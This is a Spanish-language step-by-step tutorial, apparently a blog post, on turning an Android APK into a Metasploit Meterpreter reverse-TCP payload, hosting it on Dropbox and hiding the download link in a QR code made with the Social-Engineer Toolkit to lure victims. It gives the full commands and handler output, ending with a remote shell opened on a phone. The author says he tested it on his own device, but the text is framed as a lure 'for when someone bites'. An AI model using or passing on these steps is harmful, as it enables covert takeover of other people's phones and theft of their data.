Muy facil con Metasploit y un pc con Ubuntu o una distribucion de linux
root@kali:~# msfupdate
2)Ahora vamos a crear el payload en forma de aplicación apk:
root@kali:~# msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.39 R > /root/prueba.apk
En lhost debemos poner la ip de nuestra interfaz, si no sabemos cual es nuestra ip en ese momento ejecutamos ifconfig y nos aparecerá. Después le indicamos que lo cree en la ruta /root/ (carpeta personal) y que cree un archivo llamado prueba.apk
3)Para hacerlo mas realista subiremos dicho archivo a dropbox por ejemplo, para generar un link de descarga, en mi caso:
https://www.dropbox.com/s/fbq7fg7o8oduxi7/prueba.apk4) Ahora lo camuflaremos en un codigo QR escaneable para ello usaremos SET de la siguiente forma:
root@kali:~# se-toolkit
set>1
set>9
Enter the URL you want the QRCode to go to:https://www.dropbox.com/s/fbq7fg7o8oduxi7/prueba.apk
Ahora SET nos dice lo siguiente:
-
- QRCode has been generated under /root/.set/reports/qrcode_attack.png
Este será el codigo QR el cual al ser escaneado por un dispositivo Android descarga la aplicación prueba.apk
5)Ahora nos pondremos a la escucha para cuando alguien pique:
root@kali:~# msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E
6)En este caso por ser una prueba local usé mi propio teléfono, al abrir la instalación, en la terminal que abrimos en el paso 5, se nos abrirá una sesión de meterpreter con la cual ya podremos jugar a nuestro antojo.
root@kali:~# msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E
PAYLOAD => android/meterpreter/reverse_tcp
LHOST => 0.0.0.0
- Started reverse handler on 0.0.0.0:4444
- Starting the payload handler...
- Sending stage (39698 bytes) to 192.168.1.37
- Meterpreter session 1 opened (192.168.1.39:4444 -> 192.168.1.37:52818) at 2013-08-25 14:31:44 +0200
meterpreter > shell
y ya estaremos en la maquina con android en una red local